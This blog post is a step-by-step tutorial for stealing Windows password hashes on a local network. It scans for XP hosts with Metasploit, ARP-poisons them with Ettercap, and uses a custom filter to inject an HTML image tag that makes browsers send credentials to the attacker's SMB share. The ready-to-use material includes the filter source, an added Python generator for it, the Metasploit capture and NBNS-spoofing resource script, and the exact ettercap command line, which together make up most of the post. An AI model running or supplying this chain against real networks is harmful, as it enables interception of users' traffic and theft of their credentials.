Monday, July 30, 2012

Using Ettercap to improve NetBIOS attacks



For those of you that have tried out NetBIOS spoofing (explained in an earlier post), you know how devastatingly effective it is on an internal network. There are, however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are only getting NTLMv2 hashes that you can't crack. If only you could somehow force those XP clients to send over their users' LM hashes...

Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap is that you can do so much more with man-in-the-middle attacks than with Cain, for instance: DNS spoofing, ARP spoofing, iframe injection and much more. Today we are going to use a custom filter to inject some HTML into the pages the clients browse, so that their browsers try to load an image from a share on our machine and we can harvest the authentication hashes they send to it.

Remember that for this attack to work you need to be on the same network segment as the targets, because we will be actively ARP-poisoning them and rewriting their traffic. That means wired clients, or wireless clients on a network you are also joined to (open, WEP or WPA alike, since the access point decrypts and forwards their frames). What you cannot do is tamper with WPA clients from outside their network, because each client's traffic is encrypted with its own pairwise key.

First of all you will need to set up Metasploit.
Let's see if we can find some low hanging fruit (XP machines). In msfconsole, point the SMB version scanner at the target range (adjust RHOSTS to the subnet you are assessing):

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.20.0/24
run



Excellent, some target XP machines. Make a note of their IP addresses, as we will need to target them with Ettercap next.

Now we need to get our filter configured for Ettercap. The filter below does two things. The first block rewrites the Accept-Encoding header in the client's requests (to a string of the same length, so the packet size does not change) so that the server replies with an uncompressed body; a gzipped page cannot be string-matched. The second block injects an HTML tag into the web pages the target is viewing. This tag tells the browser that it needs to load an image to display on the page, and to load it from a share on your IP.
The image won't be there, but Metasploit will answer the SMB connection, hand the client a fixed challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.



if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("Encoding Taken Care Of...\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "head>")) {
      replace("head>", "head> <img src=\"\\\\192.168.20.10\\pixel.gif\"> ");
      msg("Replacement Filter Ran.\n");
   }
}



Next, install Ettercap (apt-get install ettercap) and compile the filter into the binary format Ettercap loads:

etterfilter /root/netbios.filter -o netbios.ef

Run this from the directory you will later start Ettercap in (or give -F the full path to netbios.ef); /usr/local/share/ettercap is simply where Ettercap keeps its own stock filters and configuration.
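The filter's two edits, as an added example in Python rather than anything from the original post or the Ettercap project: build_filter writes the filter source for a given attacker IP (showing the backslash escaping a UNC path needs inside a filter string), and the two functions apply the same request-side and response-side edits to constructed HTTP bytes. The IP 192.168.20.10 and the pixel.gif name are the post's own values; the sample traffic, the function names and the extra checks (refusing compressed bodies, fixing Content-Length) are assumptions of this example.

```python
"""Model of the two edits the Ettercap filter in this post makes to HTTP traffic.

Added example, not code from the original post or from the Ettercap project.
The attacker IP (192.168.20.10) and image name (pixel.gif) are the post's own;
the sample request/response bytes are constructed here, not captured.
"""
import re

# Same length as b"Accept-Encoding" (15 bytes), so the request segment keeps its
# size; the server just stops recognising the header and replies uncompressed,
# which is what makes the later plain-text "head>" match possible.
ACCEPT_ENCODING = b"Accept-Encoding"
ACCEPT_RUBBISH = b"Accept-Rubbish!"
assert len(ACCEPT_ENCODING) == len(ACCEPT_RUBBISH)

HEAD_RE = re.compile(rb"<head(\s[^>]*)?>", re.IGNORECASE)


def unc_image_tag(attacker_ip: str, name: str = "pixel.gif") -> bytes:
    """HTML that makes IE on XP fetch \\\\<ip>\\<name> over SMB, authenticating as it goes."""
    return f' <img src="\\\\{attacker_ip}\\{name}"> '.encode()


def build_filter(attacker_ip: str) -> str:
    """etterfilter source for the attack.

    Filter strings use C-style escapes: every backslash in the UNC path is
    doubled and the quotes around src= are escaped, so the file carries
    \\\\\\\\<ip>\\\\pixel.gif for the two-backslash UNC prefix.
    """
    tag = unc_image_tag(attacker_ip).decode()
    escaped = tag.replace("\\", "\\\\").replace('"', '\\"')
    return (
        "if (ip.proto == TCP && tcp.dst == 80) {\n"
        '   if (search(DATA.data, "Accept-Encoding")) {\n'
        '      replace("Accept-Encoding", "Accept-Rubbish!");\n'
        '      msg("Encoding Taken Care Of...\\n");\n'
        "   }\n"
        "}\n"
        "if (ip.proto == TCP && tcp.src == 80) {\n"
        '   if (search(DATA.data, "head>")) {\n'
        f'      replace("head>", "head>{escaped}");\n'
        '      msg("Replacement Filter Ran.\\n");\n'
        "   }\n"
        "}\n"
    )


def neuter_accept_encoding(request: bytes) -> bytes:
    """Client -> server edit (the tcp.dst == 80 block): same-length overwrite."""
    return request.replace(ACCEPT_ENCODING, ACCEPT_RUBBISH, 1)


def inject_unc_image(response: bytes, attacker_ip: str) -> bytes:
    """Server -> client edit (the tcp.src == 80 block) on one whole HTTP response.

    Goes a little beyond the filter: skips compressed bodies (the failure the
    request-side edit exists to prevent), matches <head ...> case-insensitively,
    injects only once, and rewrites Content-Length so the client does not
    truncate the page. Ettercap itself works per TCP segment with exact
    substring replacement, so "head>" must sit inside one packet.
    """
    sep = response.find(b"\r\n\r\n")
    if sep == -1:
        return response
    headers, body = response[: sep + 4], response[sep + 4 :]
    if re.search(rb"^content-encoding:\s*(gzip|deflate|br)", headers, re.I | re.M):
        return response  # compressed body: a string match would never hit
    m = HEAD_RE.search(body)
    if m is None:
        return response
    new_body = body[: m.end()] + unc_image_tag(attacker_ip) + body[m.end() :]
    headers = re.sub(
        rb"^(content-length:\s*)\d+",
        lambda cl: cl.group(1) + str(len(new_body)).encode(),
        headers,
        count=1,
        flags=re.I | re.M,
    )
    return headers + new_body


# Constructed sample traffic (not a capture).
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: intranet\r\n"
    b"Accept-Encoding: gzip, deflate\r\n\r\n"
)
SAMPLE_BODY = b"<html><head><title>hi</title></head><body>x</body></html>"
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n" + SAMPLE_BODY
)

if __name__ == "__main__":
    print(build_filter("192.168.20.10"))
    print(neuter_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_unc_image(SAMPLE_RESPONSE, "192.168.20.10").decode())
```

One difference from Ettercap is worth keeping in mind: the Python works on a whole reassembled response, whereas Ettercap's replace() acts on each TCP segment and on exact bytes, so "head>" only fires when it appears inside a single packet with that exact case. The uncompressed, early `<head>` of most pages makes that work in practice, which is why the Accept-Encoding edit matters.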

We now need to return to Metasploit and set up the capture modules so they are ready for the incoming hashes. You can use the following resource script to save time (replace 192.168.20.10 with your own IP, the same one used in the filter):


use auxiliary/server/capture/smb
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
run
use auxiliary/server/capture/http_ntlm
set srvhost 192.168.20.10
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
run
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.20.10
run


Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /192.168.20.26,29,30/ /<gatewayIP>/ -i eth0

This fires up Ettercap in text mode (-T) without verbose output (-q), loads the compiled filter (-F) and uses the ARP poisoning method (-M arp:remote) against the three XP clients in the first target group and the gateway in the second. The remote option matters: it poisons both the clients and the gateway, so the web servers' responses (the tcp.src == 80 packets the filter rewrites) pass through us on the way back, not just the outgoing requests.

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to quit Ettercap with "q" once you have the hashes rather than killing it: on a clean exit it re-ARPs the victims with the real gateway MAC, which avoids the network drop-out they would otherwise suffer while their poisoned ARP entries time out.



Make sure you have permission first, and have fun folks!
